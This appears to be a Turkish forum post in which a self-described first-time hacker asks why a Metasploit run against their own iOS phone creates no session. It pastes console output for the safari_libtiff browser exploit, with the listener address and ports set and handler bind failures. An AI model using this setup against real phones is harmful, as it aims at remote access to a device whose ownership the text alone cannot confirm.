Kendi ios telefonuma sızmaya çalışıyorum ve session -i 1 yaparak meterpreter kısmına geçeceğim ama session oluşturulamadı diyor.
Aşağıdaki gibi yaptım
sessions -i yazınca
çıkıyor. Ne yapmalıyım ?
Not: İlk Hack im
Aşağıdaki gibi yaptım
Kod:
msf6 exploit(apple_ios/browser/safari_libtiff) > set LHOST 212.***.118.246
LHOST => 212.***.118.246
msf6 exploit(apple_ios/browser/safari_libtiff) > run
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[-] Handler failed to bind to 212.***.118.246:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
msf6 exploit(apple_ios/browser/safari_libtiff) > set LHOST 212.***.118.246
LHOST => 212.***.118.246
msf6 exploit(apple_ios/browser/safari_libtiff) > set LPORT 8080
LPORT => 8080
msf6 exploit(apple_ios/browser/safari_libtiff) > run
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.
[-] Handler failed to bind to 212.***.118.246:8080:- -
[-] Handler failed to bind to 0.0.0.0:8080:- -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8080).
msf6 exploit(apple_ios/browser/safari_libtiff) >
Kod:
Active sessions
===============
No active sessions.
Not: İlk Hack im
Son düzenleme:

